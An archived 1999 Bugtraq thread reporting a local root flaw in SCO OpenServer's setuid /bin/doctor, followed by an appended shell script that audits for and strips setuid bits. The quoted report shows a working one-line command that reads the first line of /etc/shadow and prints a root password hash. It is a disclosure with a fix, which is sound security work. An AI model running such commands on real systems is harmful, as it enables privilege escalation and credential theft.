[11804] in bugtraq


Re: SCO 5.0.5 /bin/doctor local root compromise

daemon@ATHENA.MIT.EDU (Seth R Arnold)
Fri Sep 10 00:33:03 1999

Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id:  <19990908113157.J7981@willamette.edu>
Date:         Wed, 8 Sep 1999 11:31:57 -0700
Reply-To: Seth R Arnold <sarnold@WILLAMETTE.EDU>
From: Seth R Arnold <sarnold@WILLAMETTE.EDU>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <041201bef65a$80544b10$3177a8c0@webley>; from Brock Tellier on
              Fri, Sep 03, 1999 at 05:20:17PM -0500

Confirmed to run under 5.0.4 as well.

On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote:
> Greetings,
>
>
> INFO:
>  There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others.  By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow).  Example:
>
> scobox:/bin$ id
> uid=136(btellier),200(users)
> scobox:/bin$ uname -a
> SCO_SV scobox 3.2 5.0.5 i386
> scobox:/bin$ doctor -V
> doctor 2.0.0e 2
> scobox:/bin$ doctor -s /etc/shadow
> doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
> scobox:/bin$
>
> And so on.
>
> FIX:
>  Just chmod -s until SCO comes out with a fix.  Although I certainly won't be changing it back to suid root anytime soon.  If a hole like this exists, there are undoubtedly countless more lurking within.
>
> Brock Tellier
> Systems Administrator
> Webley Systems

--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
Hi! I'm a .signature virus! Copy me into
your ~/.signature to help me spread!

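The mitigation recommended in the quoted post (strip the setuid bit with chmod -s until a vendor fix arrives) as a small, self-checking POSIX shell script. This is an added example, not code from either poster or from SCO; it audits a directory tree for setuid files, removes the bit from one of them, and verifies the change. It runs against a constructed temporary file standing in for /bin/doctor, so it needs neither root nor an SCO system.

```shell
#!/bin/sh
# Added example (not part of the original thread or of SCO's doctor tool).
# Shows the defender's side of the thread: audit for setuid binaries, strip the
# setuid bit from a suspect one, and confirm the bit is gone.
# All paths are constructed: a temp file plays the role of /bin/doctor.

# Symbolic mode string of a file, e.g. "-rwsr-xr-x" (first 10 columns of ls -ld).
file_mode() {
    ls -ld "$1" | cut -c1-10
}

# Succeeds if the setuid bit is set: an 's' or 'S' in the user-execute column.
is_setuid() {
    case "$(file_mode "$1")" in
        ???[sS]*) return 0 ;;
        *)        return 1 ;;
    esac
}

# The audit step: every regular file with the setuid bit under a tree, one per line.
# On a real host this would be run as: list_setuid /
list_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# The fix from the post ("chmod -s"): clear setuid and verify it is really off.
strip_setuid() {
    chmod u-s "$1" && ! is_setuid "$1"
}

# End-to-end check on a constructed file so the whole flow is exercised offline.
demo() {
    dir=$(mktemp -d) || return 1
    fake="$dir/doctor"
    : > "$fake"
    chmod 4755 "$fake"          # constructed: setuid on, like the vulnerable /bin/doctor
    before=$(list_setuid "$dir" | wc -l | tr -d ' ')
    strip_setuid "$fake" || { rm -rf "$dir"; return 1; }
    after=$(list_setuid "$dir" | wc -l | tr -d ' ')
    rm -rf "$dir"
    [ "$before" -eq 1 ] && [ "$after" -eq 0 ]
}

demo && echo "setuid bit audited and removed"
```

In practice list_setuid would be run over the root filesystem and its output compared against the vendor's expected set of setuid programs, so that anything unexpected, such as a setuid script interpreter like doctor, stands out before it is abused.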